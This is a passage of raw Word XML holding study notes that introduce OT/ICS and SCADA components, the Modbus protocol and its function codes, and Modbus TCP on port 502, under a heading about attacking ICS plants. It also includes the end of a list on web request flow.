    </w:p>
    <w:p w14:paraId="3660556A" w14:textId="6D02C653" w:rsidR="00FE15B2" w:rsidRDefault="00FE15B2" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>authoritative DNS server advises IP address for website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E69D80" w14:textId="78C22BD1" w:rsidR="00FE15B2" w:rsidRDefault="00FE15B2" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">request passes through WAF </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> load balancer </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Connect to port 80 or 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C17DA80" w14:textId="6146BE9F" w:rsidR="00FE15B2" w:rsidRDefault="00FE15B2" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>send HTTP GET request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720BD53E" w14:textId="399C7641" w:rsidR="00FE15B2" w:rsidRDefault="00FE15B2" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Web Application talks to Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DBAC0A" w14:textId="449FD3BC" w:rsidR="00FE15B2" w:rsidRDefault="00FE15B2" w:rsidP="0011412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Browser render HTML into viewable website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C277B0" w14:textId="2A72DC63" w:rsidR="00773362" w:rsidRDefault="00773362" w:rsidP="00773362">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BB45250" w14:textId="53B194A7" w:rsidR="00773362" w:rsidRDefault="005943C8" w:rsidP="00773362">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Attacking ICS Plants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA0BA9C" w14:textId="52631448" w:rsidR="005943C8" w:rsidRDefault="005943C8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction to OT/ICS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0DDE1B" w14:textId="4A12A388" w:rsidR="005943C8" w:rsidRDefault="005943C8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Operational Technology (OT) refers to systems used to monitor and control industrial operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48187997" w14:textId="7CAFAE3E" w:rsidR="005943C8" w:rsidRDefault="005943C8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Industrial Control Systems includes systems used to monitor and control industrial processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABC7B1A" w14:textId="6BFE08F3" w:rsidR="005943C8" w:rsidRDefault="005943C8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>OT/ICS development availability is typically preferred over integrity/confidentiality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAA460C" w14:textId="2D2060A3" w:rsidR="005943C8" w:rsidRDefault="005943C8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SCADA Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E281140" w14:textId="427350FF" w:rsidR="005943C8" w:rsidRDefault="005943C8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Supervisory Computers – servers used to manage the process gathering data on the process and communicating with filed devices (RLCs/RTUs). Smaller deployments HMI is embedded in a single computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF72844" w14:textId="557A0211" w:rsidR="005943C8" w:rsidRDefault="005943C8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>PLCs – digital computers used mainly for automating industrial processes. Continuously monitor sensors and make decisions controlling devices. Remote Terminal Units overlap with PLCs but are preferred for wider geographical telemetry whereas PLCs are better for local controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AE3572" w14:textId="5DFB4249" w:rsidR="005943C8" w:rsidRDefault="005943C8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Communication Network – network connecting all SCADA components (ethernet, serial, telephones, radio, cellular). Network failures do not necessarily impact negatively on the plant process. Both RTUs and PLCs are usually designed to operate autonomously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2AD572" w14:textId="6791FEDF" w:rsidR="005943C8" w:rsidRDefault="005943C8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Human Machine Interface (HMI) – display a digitalized representation of the plant. Operators can interact with the plant issuing commands</w:t>
      </w:r>
      <w:r w:rsidR="00007723">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EB9903" w14:textId="4CA2A45B" w:rsidR="00007723" w:rsidRDefault="00007723" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction to Modbus Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16880510" w14:textId="3D4D3F53" w:rsidR="00007723" w:rsidRDefault="00007723" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Modbus is an industrial protocol developed by Modicon and is widely used to connect industrial devices, protocol specification is available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5783389B" w14:textId="52209B9E" w:rsidR="00007723" w:rsidRDefault="00007723" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>uses master/slave protocol to read/write slave registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FEE227" w14:textId="2B14B6F4" w:rsidR="00007723" w:rsidRDefault="00007723" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>RTU usually used via RS-485 serial network – each slave has a unique 8-bit address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BB7BF7" w14:textId="37820021" w:rsidR="00007723" w:rsidRDefault="00007723" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Modbus data is used to write/read 16-bit long registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114BBA99" w14:textId="62835E92" w:rsidR="00007723" w:rsidRDefault="00007723" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>most common is called “holding register” which is readable/writeable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CFF0C3" w14:textId="30633509" w:rsidR="00007723" w:rsidRDefault="00007723" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>“input register” is readable only</w:t>
      </w:r>
      <w:r w:rsidR="00B84DE8">
        <w:t>, “coil” and “discrete input” are 1-bit long, with coils being readable/writeable and discrete only readable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347B735F" w14:textId="77777777" w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w:rsidRDefault="00B84DE8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B84DE8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Most commonly Modbus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6"/>
        <w:gridCol w:w="3690"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w14:paraId="6F8D12B1" w14:textId="77777777" w:rsidTr="00B84DE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F05DA80" w14:textId="77777777" w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w:rsidRDefault="00B84DE8" w:rsidP="00B84DE8">
            <w:pPr>
              <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B84DE8">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Function Code</w:t>
            </w:r>
          </w:p>
        </w:tc>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vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E9C5C49" w14:textId="77777777" w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w:rsidRDefault="00B84DE8" w:rsidP="00B84DE8">
            <w:pPr>
              <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B84DE8">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Register Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w14:paraId="525BCA9F" w14:textId="77777777" w:rsidTr="00B84DE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1212F6A8" w14:textId="77777777" w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w:rsidRDefault="00B84DE8" w:rsidP="00B84DE8">
            <w:pPr>
              <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B84DE8">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>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vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C8D434D" w14:textId="77777777" w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w:rsidRDefault="00B84DE8" w:rsidP="00B84DE8">
            <w:pPr>
              <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B84DE8">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Read Coil</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w14:paraId="69CD503A" w14:textId="77777777" w:rsidTr="00B84DE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26791419" w14:textId="77777777" w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w:rsidRDefault="00B84DE8" w:rsidP="00B84DE8">
            <w:pPr>
              <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B84DE8">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>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vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E04D0DC" w14:textId="77777777" w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w:rsidRDefault="00B84DE8" w:rsidP="00B84DE8">
            <w:pPr>
              <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B84DE8">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Read Discrete Input</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w14:paraId="0F882CF7" w14:textId="77777777" w:rsidTr="00B84DE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="048BA5C7" w14:textId="77777777" w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w:rsidRDefault="00B84DE8" w:rsidP="00B84DE8">
            <w:pPr>
              <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B84DE8">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>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vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C637B90" w14:textId="77777777" w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w:rsidRDefault="00B84DE8" w:rsidP="00B84DE8">
            <w:pPr>
              <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B84DE8">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Read Holding Registers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w14:paraId="6A343413" w14:textId="77777777" w:rsidTr="00B84DE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7631B7B3" w14:textId="77777777" w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w:rsidRDefault="00B84DE8" w:rsidP="00B84DE8">
            <w:pPr>
              <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B84DE8">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>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vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C61422A" w14:textId="77777777" w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w:rsidRDefault="00B84DE8" w:rsidP="00B84DE8">
            <w:pPr>
              <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B84DE8">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Read Input Registers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w14:paraId="78D681E7" w14:textId="77777777" w:rsidTr="00B84DE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FBEAF9D" w14:textId="77777777" w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w:rsidRDefault="00B84DE8" w:rsidP="00B84DE8">
            <w:pPr>
              <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B84DE8">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>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vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01641DC3" w14:textId="77777777" w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w:rsidRDefault="00B84DE8" w:rsidP="00B84DE8">
            <w:pPr>
              <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B84DE8">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Write Single Coil</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w14:paraId="67971C54" w14:textId="77777777" w:rsidTr="00B84DE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5842605F" w14:textId="77777777" w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w:rsidRDefault="00B84DE8" w:rsidP="00B84DE8">
            <w:pPr>
              <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B84DE8">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>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vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0577FFA5" w14:textId="77777777" w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w:rsidRDefault="00B84DE8" w:rsidP="00B84DE8">
            <w:pPr>
              <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B84DE8">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Write Single Holding Register</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w14:paraId="798AF5ED" w14:textId="77777777" w:rsidTr="00B84DE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B26B5FB" w14:textId="77777777" w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w:rsidRDefault="00B84DE8" w:rsidP="00B84DE8">
            <w:pPr>
              <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B84DE8">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>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vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07203481" w14:textId="77777777" w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w:rsidRDefault="00B84DE8" w:rsidP="00B84DE8">
            <w:pPr>
              <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B84DE8">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Write Multiple Coils</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w14:paraId="446AAAFF" w14:textId="77777777" w:rsidTr="00B84DE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>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vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="630986B9" w14:textId="77777777" w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w:rsidRDefault="00B84DE8" w:rsidP="00B84DE8">
            <w:pPr>
              <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B84DE8">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>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vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F824A55" w14:textId="77777777" w:rsidR="00B84DE8" w:rsidRPr="00B84DE8" w:rsidRDefault="00B84DE8" w:rsidP="00B84DE8">
            <w:pPr>
              <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B84DE8">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Write Multiple Holding Registers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68F67322" w14:textId="209AB80F" w:rsidR="00B84DE8" w:rsidRDefault="00B84DE8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Modbus TCP encapsulates RTU request and response data packets in a TCP packet transmitted over standard Ethernet using port 502</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A93E513" w14:textId="12273A96" w:rsidR="00B84DE8" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId226" w:history="1">
        <w:r w:rsidR="00B84DE8" w:rsidRPr="00B62BD3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.csimn.com/CSI_pages/Modbus101.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F07F10B" w14:textId="7AB5C629" w:rsidR="00B84DE8" w:rsidRDefault="006064C0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Play to Learn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22570AB1" w14:textId="5A3F55D7" w:rsidR="006064C0" w:rsidRDefault="006064C0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>learning about registries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACCFC16" w14:textId="243921E0" w:rsidR="006064C0" w:rsidRDefault="006064C0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
